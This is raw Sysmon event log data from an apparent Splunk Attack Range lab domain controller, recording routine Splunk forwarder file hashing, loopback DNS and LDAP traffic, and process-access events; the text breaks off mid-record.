23542300x80000000000000002201055Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:45.306{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEE3A25A5D34D66E9797300D2A26CA4F,SHA256=81EECBD7C83DF9091A91AEE408C89B04A31747E957D286ABD957EA100E4480CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201058Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:46.962{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A11573617AFD5C1884E4A3B2F975D50,SHA256=D98DC6A1C8BCBB5AF4126060AB691942CD519A7CF3A5D4A06F19914EC6E1D637,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201057Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:46.321{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BE3B395F5C473750226461FF487706C,SHA256=57DCADDA07D71C22BFF34A00BC382950AA0865BE6F6CE672058604DB9A354CCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201059Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:47.337{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61D1ECEC7801E3F1F89C1989C1EA594A,SHA256=F82150075A6764C53E1960D33EB62375CB21E88A22E7E86E4B6F6D491D9DBEB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201060Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:48.337{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0582BECAB0376782D692E628C2CD56D,SHA256=9C10614D0D63ABFDE7C4610B410835056290A1FD859C644F88B1366EFB5FA1C6,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000002201064Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 13:56:49.774{5ABCFE62-842F-603E-1200-00000000AD01}392C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d710fe-0x392da60a) 354300x80000000000000002201063Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:45.970{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55184-false10.0.1.12-8000- 23542300x80000000000000002201062Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:49.353{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25CFAB01058FF4833926563C24F3FD9E,SHA256=5DE2D3D028B2E8A463DE8381449820B6C57957504CD9B82F3FF3059C6EDF2C3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201061Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:49.165{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BCB6D11F7BC99DAE5A4E44FF19F39C65,SHA256=B42B632BA341946B6E5DD8D121C100CB99D9DB47ABD0BE3806ADB6B9F2B6ACD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201066Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:50.821{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9A4BD9AC1AC8CA6E7E4A8B792062C018,SHA256=2EBCFDF16DA8499B6076AEEDC4AF73A205370A4F8A009A0240864B434360215A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201065Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:50.368{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFA27617C9627AB4AA8639E935CB0B67,SHA256=60D50AEADBD500019F5B176A682F66624A1CDFCE42064487A250780FF13E9A27,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201068Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:47.595{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local57571- 23542300x80000000000000002201067Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:51.384{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E4D7AB2FFD0FBE256EEA3105B174351,SHA256=7DA21EE093612A92BA1FB58E2ED083E2E9C89BB09C609349EDB99ACFD3621C2C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201070Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:48.610{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-57571- 23542300x80000000000000002201069Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:52.384{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36841E5FA0F84EB55090755D88E6E207,SHA256=B3E7B8D01F82A84ADA2293E7F5AD72DBDF8C38A604468FA2987C8A1D41AD91AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201071Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:53.399{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5EC8EFF1AA4BD7EF02993136EF4D97B,SHA256=009C256E17CE320D8D5474706C6AD13273098442332B01DF0BDD2E2823F16B8E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201073Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:54.399{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46B4900E7D92EF2EFE6AC62536B86651,SHA256=4D3B7D915A77B050DD44DDD2CB406C519A72A5293C70B656232BDF251B47B2E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201072Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:54.165{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=735EB6E9CA0E161F0F562222A5BC3650,SHA256=9AF2D42EA2F3C71EC86FC357527A11ED1525FA0375674CD5BC6FAC6C7E9D7EAB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201075Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:50.986{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55185-false10.0.1.12-8000- 23542300x80000000000000002201074Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:55.399{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=002BB8F3E478FF573DFF527FD3F4D81E,SHA256=392A382CF3FDCA00BF87302F0B6B5DA72CD2327D7A552D1942BEEA3008EEC027,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201076Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:56.415{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DDBE7A1DDFD0EC12D019C37D406DE14,SHA256=4F51D32944C4882843EF2A4D09B9673F27EAE5E02B2E118F1B41072CA1F49BCB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201080Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:53.846{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55186-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002201079Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:53.846{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55186-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 23542300x80000000000000002201078Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:57.431{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5074385FAD2BA4D857ABC369F9DBD5DF,SHA256=1EC7FABBE130F43FA8B2B2F20C6399B9646A779345A1FDBB92C509739FB14CEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201077Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:57.024{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=45E1FCF322DDB492A054E544365FB6D6,SHA256=3CE63A43453120F53B22C45FFEA66B12AD9BEA5F6477E9CCE450263D85967DB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201082Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:58.634{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0E501A043D44A51C52382161E249821A,SHA256=1707BD915D82A23C02EAB59ED7457DBB2D9C891C01E1C452ABFFACB12294A123,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201081Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:58.446{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2E7F4F6FD1F07F1FD18D2EFE0205D99,SHA256=039B8C37D976C3C613B33EF1C90A1599565976B2E4A15ECB482F07B19F917743,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201083Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:59.446{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=736FAF1B10A7F2A2CE49CCCBD90B5F9F,SHA256=D32EE958617D14A18CF1C052FB262286919507932FE81C1674B564DDE0005FC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201086Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:00.790{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B44D7CAA40A1EC111B589A17EC9581FE,SHA256=FCB7F3DC6EF1D6AE96509A6D1780712CC47FD51CC7CED834652DBB8D5BB63344,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201085Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:56.017{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55187-false10.0.1.12-8000- 23542300x80000000000000002201084Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:00.462{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEFBF9C30A18A39FDA02F51518B61BAE,SHA256=EC6F0D221F7707C4B298AC35956EC5791EDCE3D298797290763976F2C58268E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201089Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:57.611{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local59654- 23542300x80000000000000002201088Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:01.790{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EC453CF5EBE176EEBCA119DDCDE53F4A,SHA256=61FF0FB0BFA9B4726CA353FBCDF39910898457DFAF66E86936D7D667C80C22EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201087Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:01.462{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=321049FB1BB3C3A11F119C9E0C0C4BD7,SHA256=5DA21A58300CB81C7748AE3CC58117F588DD53FB612F3E7DECA7D1BD0671B409,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201107Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:02.806{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E72E-6040-F54D-00000000AD01}5520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201106Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:02.806{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201105Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:02.806{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201104Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:02.806{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201103Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:02.806{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201102Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:02.806{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E72E-6040-F54D-00000000AD01}5520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201101Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:02.806{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E72E-6040-F54D-00000000AD01}5520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201100Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:02.806{5ABCFE62-E72E-6040-F54D-00000000AD01}5520C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201099Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:02.478{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C36DC364409D450608B115672CD57C4,SHA256=8895562F8CA61416828F349C24FFBB4622B49F65A495D400F634892F9DF92C13,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201098Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:02.399{5ABCFE62-E72E-6040-F44D-00000000AD01}58005568C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201097Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:02.274{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E72E-6040-F44D-00000000AD01}5800C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201096Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 